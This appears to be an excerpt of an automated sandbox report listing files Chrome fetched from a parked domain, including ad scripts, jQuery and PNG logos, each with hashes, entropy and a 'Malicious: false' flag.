                                                                                  Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"5942599812270562725",packages:"domains",module:"ads",version:"1",m:{cei:"17300003,17301431,17301433,17301436,17301548,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_chatbot":0,"afs_chatbot_aa":500,"afs_gpp_api":0,"disable_usp_api":10,"heterodyne_t
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:downloaded
                                                                                  Size (bytes):200
                                                                                  Entropy (8bit):5.025855206845441
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:t6wfDpmc4slhohC/vmI4SmK0xhFELE47zF:t6qnoU/vmRI0xQTF
                                                                                  MD5:11B3089D616633CA6B73B57AA877EEB4
                                                                                  SHA1:07632F63E06B30D9B63C97177D3A8122629BDA9B
                                                                                  SHA-256:809FB4619D2A2F1A85DBDA8CC69A7F1659215212D708A098D62150EEE57070C1
                                                                                  SHA-512:079B0E35B479DFDBE64A987661000F4A034B10688E26F2A5FE6AAA807E81CCC5593D40609B731AB3340E687D83DD08DE4B8B1E01CDAC9D4523A9F6BB3ACFCBA0
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%23ffffff
                                                                                  Preview:<svg fill='#ffffff' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from Unix, truncated
                                                                                  Category:downloaded
                                                                                  Size (bytes):20
                                                                                  Entropy (8bit):1.5567796494470394
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FttTll:XtTll
                                                                                  MD5:A4745ABC5E7FDB89CC6DF3069F3C6E69
                                                                                  SHA1:74789F7DDBEBD5B7323F6F8174005B4BF8C1F1ED
                                                                                  SHA-256:D1111B245F685176180E6F1631E6DC49BADF6672368E9CE260C71355165EFFDF
                                                                                  SHA-512:849461CB54ECDE577246AAD993D1ECABB879913E353AE322561C7C57605F571E23210FE12BDCEF49FAA99B5B003611976FF64348F620968271E38BBA1C7D7F62
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:http://www.xay.io/track.php?domain=xay.io&caf=1&toggle=answercheck&answer=yes&uid=MTczNjY0MTk5OC42Mjk3OjZiNTYzNWM4MjkwMjRjZjEyNmJlMGYwNjk0Mjg5MDVkMDUxYTA3M2JiYTQ5MjZmZDY5Yjc2Zjg0MjE1N2RlMjk6Njc4MzBkY2U5OWJkOQ%3D%3D
                                                                                  Preview:....................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 1348 x 596, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):26887
                                                                                  Entropy (8bit):7.695603867519574
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:siOD3EEEEEwtimkGGdEEEEEEE3EtmmNKvr/WMG7mEHZB6N+3xEEEQWCpo4ibEyfN:siOD3EEEEEqpkGmEEEEEEE3EtSvruMGG
                                                                                  MD5:54E862DC5600E9B3C61157EC356738DE
                                                                                  SHA1:56784480BC9FA75062BCB765729680899C0021DE
                                                                                  SHA-256:7A26F7A1E36844277BD8394E730F3B64F1CA60D99F832AEC634589E75964F34D
                                                                                  SHA-512:E475B88FCF66CBC8E58E5A4318D6C15A30B614C6C63D708343C02E205E3F9B97CC99A5D31AFAC4D393A3B8B35E8848C7D45AA8CAE8F92D148E148C47B8973DF8
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://i.imgur.com/g1U1hqo.png
                                                                                  Preview:.PNG........IHDR...D...T.....Ro......sRGB.........gAMA......a...h.IDATx^.....u....k...5.SH.E....&........Zu...S.u.....)..]e]...X.-.J.3.+........!.br.}..G.?U......$5.z.6U..kf*.....u]........T.......6A.......f.........a.......!......`3.y.....l.0.................<.....6C.......f........C.u5.......;.P...K...DB......I.O.4...$2.......`3.y.....l.0.................<.....6C.......f.........a......_....{.!4....y..b..U.}v.b......^.....Hdj...$ .<...&./<......aZ......"52~...O.>...+.^..YQ..S......Hd.y...$..........w...oZ.R.^..j.X..|...m....J..r..9s..I..(H...WUU.<...L.y...L\.....M....m...._....O3...G...$%Wj.[3...?...L......v.U..v..<r..PI....f....p.......^.eX.......\..a....0.....+.../?.o...1E.f.0F..~......x..F...W~..].t.7.....*.}.10e.rk4~..N....3f477WVVZ...~.......2.J.<.......@,.........za...#..|iii{{.d...VI.mmmR...O..0.a.....,..k.......ks.f..0...../.?..U4....$v...M.$.{.nI.S.N%....0.....+....K.......~`./}S......O...#...u...x..|iiiqq.U'.t.u.@d..q......c.%.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 16555
                                                                                  Category:downloaded
                                                                                  Size (bytes):6320
                                                                                  Entropy (8bit):7.971532435680361
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:cqfoGBowYBwun4SnIa5MBezafJGbIOkPTh+NR+/UJkeXVL5ZdES4L/5vcJsiBWTa:cqBB8n9+VZGR+/Mk2DOS4LxUWiB6k0k
                                                                                  MD5:258A24FCADACCE685D0D79E15AE4EE24
                                                                                  SHA1:84CF463EB7C89B7FCAF75358DBAB61E4ECB8EE9D
                                                                                  SHA-256:55F300D68BCDFE50397C6514FC1F48C7F4C1F0CF194A8327FB4EFAF4F6AE70AC
                                                                                  SHA-512:430002392342909B397EE6199E1C69F4CE4A6B3C69AB1AAA326936422D97E665FC16D9976099E96350BB9E5644C4AC09B376ADE43EF1F6C7ED7572BC7F0C8D46
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:http://www.xay.io/
                                                                                  Preview:...........[yw.....S(.L..,...`.........L.........~...U%!l....=}.L....{o.{.....'...2....C.PL=.3..]c2a.z..~.l.v/?.....h7nO..o..O...S..q......s..Q.=.4.|S>....s3.......k.;........4........:..z.W.a]6+.....V..4....m......2.?.\=...*..y..../.O./.......\znsh_7.7..w..O7..I...../.3.._u......}.L-......._O..`V...evY..0.....V..b...`N.8.t....S..`\0.....8q..9A.....b..z"`. G.j.1.=...y0.T..8 G..zba........e.......2.%.X..X.....fu-..#.r&...........lv...Y.=.7A...m.L.i...ox./0.. .......}..=w.Ue..d.g.*3.s,.._..Y.v....j...r..M...`.....Z.......(.......T..0[.m..(.k....?..u...-.e.@.^=.z.#R.....J"..$"..|"}+`..(..i9.'.a.....3.f.G=@...U..~......g.....]7.k..7)I.d.....T!-..L.s.w..B.......-..*..9R.jD.\.k..#,rhF+a......9.7.X_.......J..E6_.2...|.k..`..H.V..G..'.%%..U.y.).d...d....2.nZs...D.....g...Ch.........`.u......}.\...E..T.(.....T>3.....u.....f...S..!.2Twj.|.U5.M..M..C.B*.[..T..Dh`....2M..#R..e.6..M.H?1...l....'OL.H..#.'..Y.n..*.;.e,?3..3.8.`.H...m.H..
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (1895)
                                                                                  Category:downloaded
                                                                                  Size (bytes):147117
                                                                                  Entropy (8bit):5.5286006465580675
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Nj4EEHxzJkfKnTi/cteUEOKl16X5II615nUnU/WD3g78JSzg2SmAtGFUI/+r9334:cKl1KII6fXsS2mpB+N3QgHMOYXQzG
                                                                                  MD5:0E5CE61FA1D3AC4B97CD936D8488394A
                                                                                  SHA1:7DD8473594822A034857DA76CA220F67694A8695
                                                                                  SHA-256:B39F169E9310E8CE68E7AFB5565D2E6FE931BB6C363C588DC8B77A81364DF66B
                                                                                  SHA-512:462CCCE82FBA7C3684B61977CC41758C376DA1335143344595590B91CD2FF498CCB363600197B8C20464072401A94697395B86C307CCC950D45C3B56D13151BE
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://www.google.com/adsense/domains/caf.js?abp=1&adsdeli=true
                                                                                  Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"5942599812270562725",packages:"domains",module:"ads",version:"1",m:{cei:"17300003,17301437,17301439,17301442,17301548,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_chatbot":0,"afs_chatbot_aa":500,"afs_gpp_api":0,"disable_usp_api":10,"heterodyne_test":85
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (14085)
                                                                                  Category:downloaded
                                                                                  Size (bytes):14879
                                                                                  Entropy (8bit):5.489676888089467
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:2E12iMpgbLLghuzV/wWrIN3Ul2uPbOTkOc:2ni0dAKHzuPagOc
                                                                                  MD5:1F43A8FF2381ED3153020708CDF11098
                                                                                  SHA1:E833757E854AD7DDDE4BC221AAEC04E48E298120
                                                                                  SHA-256:A432C49EA2A1A312E90CF79825E4C7B744B342A120B0A8B3F069382066AA829D
                                                                                  SHA-512:D9FEB29B80EB4EC9E0D46D7E08758FCEB58AE0161C040CBAA7D1047DD3E9BA4DA67550AA6AD4BCB9E193BA25FA9243D5ACB02DE61880D29C8FEDF2700AF0B1B5
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://syndicatedsearch.goog/afs/ads?adtest=off&psid=7840396037&pcsa=false&channel=bucket007%2Cbucket011%2Cbucket088%2Cbucket089&client=dp-teaminternet09_3ph&r=m&hl=en&rpbu=http%3A%2F%2Fwww.xay.io%2F%3Fts%3DfENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTEsYnVja2V0MDg4LGJ1Y2tldDA4OXx8fHx8fDY3ODMwZGNlOTliOTB8fHwxNzM2NjQxOTk4LjY2MjN8ZWJkYzVjNWEwYmJjZmY4MTY3MWEzZmNmNmE1MDkzNWY1OGIwZjk3N3x8fHx8MXx8MHwwfHx8fDF8fHx8fDB8MHx8fHx8fHx8fHwwfDB8fDB8fHwwfDB8VzEwPXx8MXxXMTA9fDgxYzkyZmQxYzNkODM3MDk2NTQ0NzEyZGVlNDg3OWIyNDQ3YjI4YmF8MHxkcC10ZWFtaW50ZXJuZXQwOV8zcGh8MHwwfHx8fA%253D%253D&max_radlink_len=40&type=3&uiopt=true&swp=as-drid-2595154941770008&oe=UTF-8&ie=UTF-8&fexp=21404%2C17300003%2C17301437%2C17301439%2C17301442%2C17301548%2C17301266%2C72717107&format=r3%7Cs&nocache=9621736641999914&num=0&output=afd_ads&domain_name=www.xay.io&v=3&bsl=8&pac=0&u_his=1&u_tz=-300&dt=1736641999915&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=855&frm=0&uio=--&cont=tc&drt=0&jsid=caf&nfp=1&jsv=712519386&rurl=http%3A%2F%2Fwww.xay.io%2F
                                                                                  Preview:<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:last-child{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.a{text-decoration:none; text-transform:none; color:inherit; display:inline-block;}.span{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;display:inline-block; overflow:hidden; text-transform:none;}.img{border:none; max-width:100%; max-height:100%;}.i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.j_>span:last-child, .j_>div:last-child, .w_, .w_:last-child{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;}.l_{-ms-overflow
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 290 x 68, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):4843
                                                                                  Entropy (8bit):7.924853519109151
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:7yEr1KWiyHLFm4IAZ0tgOfzjRrqmGdMH1bM3J63fI+kBdb01ye:Vr1KWiGm4vqzbtWmGdKtCwIbM5
                                                                                  MD5:76AF4342A7E8E04541014114975C7D02
                                                                                  SHA1:AB1278B3610E2CE0DCAAD9CA984B89B155F56F5D
                                                                                  SHA-256:E01ACC3A33D5C195B6B6AFB510A78D06D8015608A5F929E03B0FC12AA74E9A7B
                                                                                  SHA-512:D934E9FF17A53C13CD4EF3BFFD6C2D86A06D9A23BF741597A7B2381616551C982D2CC86EE37D71DA18ADFA94254693B7303D8FE1E067FEA7C0BD3D261A59375B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR..."...D.....%d8E....IDATx^.]k....^..U..U....._......)W....qN ....".....9.u......7`...3....<8.%X.v.@......gg..Y...7./..?._^o......?...k..{7....c.R..p.p..8.X/.`^..S.....%PZ..P......s.@?......bn.,.........P#tcp.<,!...^h*...........).(.(.hr.|A..v.9.......FE........._...RW.9_^q.......n;..."...2.(O....W..z...Qxw.X.wqy.....3:eE,c?M.0.... .z......*..6T./....2...!.(`..b...>..^..<.`..N..=..r>........(-.}W..!8].(.......?.......hh..............z=..i.|......m....!80s.....n-D.J.....F.@.........Pj..WD...;s.v..~.!d.Ky......T....\....P=.6b.+Z^.W.....W.wS.W........!...Z{.....d.bf..;.......-x.+h.....1....T......W..\.........x.r.v......Y..F.....8f z..{...O........i..z6.T.X..YW.G.Km....D....h..(..Jhf..?......6...7..(%|..}..>.#.#....t\..a....I.;q.._^.^P..>..zC!..!#...@g^yRss3.=WN.....D...FM."..l...R.~.l..E..}..h...3.Ht....f,.n.. B.f{E..8..[@.Z.d..-..Tc^..&.;.}.S-g.... ..c....cY..i.).w. .i....5..m&..q.s...[...I....'..v.nA(.>.;.)\.u.B.D.-...4.}sy
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 290 x 68, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):4843
                                                                                  Entropy (8bit):7.924853519109151
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:7yEr1KWiyHLFm4IAZ0tgOfzjRrqmGdMH1bM3J63fI+kBdb01ye:Vr1KWiGm4vqzbtWmGdKtCwIbM5
                                                                                  MD5:76AF4342A7E8E04541014114975C7D02
                                                                                  SHA1:AB1278B3610E2CE0DCAAD9CA984B89B155F56F5D
                                                                                  SHA-256:E01ACC3A33D5C195B6B6AFB510A78D06D8015608A5F929E03B0FC12AA74E9A7B
                                                                                  SHA-512:D934E9FF17A53C13CD4EF3BFFD6C2D86A06D9A23BF741597A7B2381616551C982D2CC86EE37D71DA18ADFA94254693B7303D8FE1E067FEA7C0BD3D261A59375B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://www.dynadot.com/tr/mainsite2023/navbar-logo-dark-2023.png
                                                                                  Preview:.PNG........IHDR..."...D.....%d8E....IDATx^.]k....^..U..U....._......)W....qN ....".....9.u......7`...3....<8.%X.v.@......gg..Y...7./..?._^o......?...k..{7....c.R..p.p..8.X/.`^..S.....%PZ..P......s.@?......bn.,.........P#tcp.<,!...^h*...........).(.(.hr.|A..v.9.......FE........._...RW.9_^q.......n;..."...2.(O....W..z...Qxw.X.wqy.....3:eE,c?M.0.... .z......*..6T./....2...!.(`..b...>..^..<.`..N..=..r>........(-.}W..!8].(.......?.......hh..............z=..i.|......m....!80s.....n-D.J.....F.@.........Pj..WD...;s.v..~.!d.Ky......T....\....P=.6b.+Z^.W.....W.wS.W........!...Z{.....d.bf..;.......-x.+h.....1....T......W..\.........x.r.v......Y..F.....8f z..{...O........i..z6.T.X..YW.G.Km....D....h..(..Jhf..?......6...7..(%|..}..>.#.#....t\..a....I.;q.._^.^P..>..zC!..!#...@g^yRss3.=WN.....D...FM."..l...R.~.l..E..}..h...3.Ht....f,.n.. B.f{E..8..[@.Z.d..-..Tc^..&.;.}.S-g.... ..c....cY..i.).w. .i....5..m&..q.s...[...I....'..v.nA(.>.;.)\.u.B.D.-...4.}sy
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 1500 x 600, 8-bit colormap, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):11375
                                                                                  Entropy (8bit):7.645494653990172
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Wg3JLNIdFb540f7mqTiLHrBjcCTN1MbaJD/RBse6ogkORdLv2Ha/:vD4N54IsHVjdN1tD7lODL/
                                                                                  MD5:0CB2E5165DC9324EB462199F04E1FFA9
                                                                                  SHA1:9E0F89847EC8A98D98A6020BC5C4ED32B7A48BF8
                                                                                  SHA-256:67DFF0AAD873050F12609885F2264417CCDD0D438311000A704C89F0865F7865
                                                                                  SHA-512:7A285C4A87B9F9093B7BA720D8FE08E0AD7E2EBDE9EF8C8D11B70AFA08245AF8F8A7281C7B3FBE8BAD21C3AFDE4F32634D3BD416822892AA47BA82C12F4B8191
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.PNG........IHDR.......X.....Om......tEXtSoftware.Adobe ImageReadyq.e<....PLTE......cdtIK^IK]IK\03IHK_acsceubdtcet..0=@SHK]IL]HK\MPbNQbORc.....0"&;(,@+/B04I.2F/3G-1D04H.2E04G15H26I59L8<P6:M9=Q7;N:>R:>Q;?R<@SIL\beuadtbetcftbes..-..0. 5.!6."7.#8."6.$9 %:!&;"'<"';$)>#(<%*?$)=&+@%*>',A&+?(-B).C(-A).B*/C+0D,1E05I15G<@R=ASIM_HL]KO`HL\MQbaeu.....-../.....0../.....0../..1..1..2..3..4. 5.!6.#8.$9.%: &;"':$)<&+>',?(-@).A*/B+0C,1D*/A-2E.3F/4G05H16I/4F05G38K6;N49K;@S;@R<ASGL^bfuaetbft.....0.!5."6.#7.$8.%9 &:!';"(<!':#)=#)<$*=&,@&,?+1E)/B06IGL]GL\HM]bfs..-.....0..1. 4.!5."6.#7.$8 '< ';*0B.4F06H06G..-..0.!5 (< (;...................................................................................................................................................................................................................................................t....tRNS..............................................................................................................................................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:data
                                                                                  Category:downloaded
                                                                                  Size (bytes):106599
                                                                                  Entropy (8bit):5.433226333251586
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Cb5Uv0wWaM56B1X1FL6/9YHjrx4ziYtCRl69JLtaLBrDgfnH1OBeFWySrbyqEcu7:CV61THjiPsLBw5XSCb/
                                                                                  MD5:753E1B5591A3F7E9ECA63CD59D1F329D
                                                                                  SHA1:878ECBC6D00C4D5A649BF8C853D0376860038566
                                                                                  SHA-256:FAB5EC76C535E5FDCA180A0B6A51358C09672181D765562A44BA5A7A86AF8B0A
                                                                                  SHA-512:8417CAEFB006E5037815F83C881CAC8D77B812819DA5B6D7DDFDB1F2C3955F2929B90E1D8CB2D4CB7BEB9D2A280891A0690B12ACA4C4B9C2AC08F63A01E0F10B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                                                                                  Preview:!function(t){var n={};function r(e){if(n[e])return n[e].exports;var i=n[e]={i:e,l:!1,exports:{}};return t[e].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"_",{value:!0})},r.t=function(t,n){if(1&n&&(t=r(t)),8&n)return t;if(4&n&&"object"==typeof t&&t&&t._)return t;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:t}),2&n&&"string"!=typeof t)for(var i in t)r.d(e,i,function(n){return t[n]}.bind(null,i));return e},r.n=function(t){var n=t&&t._?function(){return t.default}:function(){return t};return r.d(n,"a",n),n},r.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},r.p="",r(r.s=5)}([function(t,n,r){var e=r(1),i=window,a=i.document,c=i.location,o=encodeURIComponent,u=decodeURIComponent,f=i.navigat
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (32065)
                                                                                  Category:downloaded
                                                                                  Size (bytes):85578
                                                                                  Entropy (8bit):5.366055229017455
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (32065)
                                                                                  Category:dropped
                                                                                  Size (bytes):85578
                                                                                  Entropy (8bit):5.366055229017455
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 114 x 114, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):3919
                                                                                  Entropy (8bit):7.914396601366556
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:6SDZ/I09Da01l+gmkyTt6Hk8nTZ14UwFtLdp:6SDS0tKg9E05TZ1b4vp
                                                                                  MD5:690CD2D878FDEE8DC9E468A57DFFB611
                                                                                  SHA1:E0D66D6D711FE013D36A98096860B4080891C140
                                                                                  SHA-256:7B25E4D630139533B101CE713BA73784CEA1ABF7283CB283996205E44A1E1FB1
                                                                                  SHA-512:FBFF080911F86492A71ECF75B8AC9B19CE76F381DBC221553CB5A1DB52C0DD25E0B4D16DA85324F792F0E9954B9413D7B6F0ED2039EEEB43E90243BF6014647B
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  URL:https://nid.naver.com/favicon_1024.png
                                                                                  Preview:.PNG........IHDR...r...r........*....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (50758)
                                                                                  Category:dropped
                                                                                  Size (bytes):51039
                                                                                  Entropy (8bit):5.247253437401007
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                  Malicious:false
                                                                                  Reputation:low
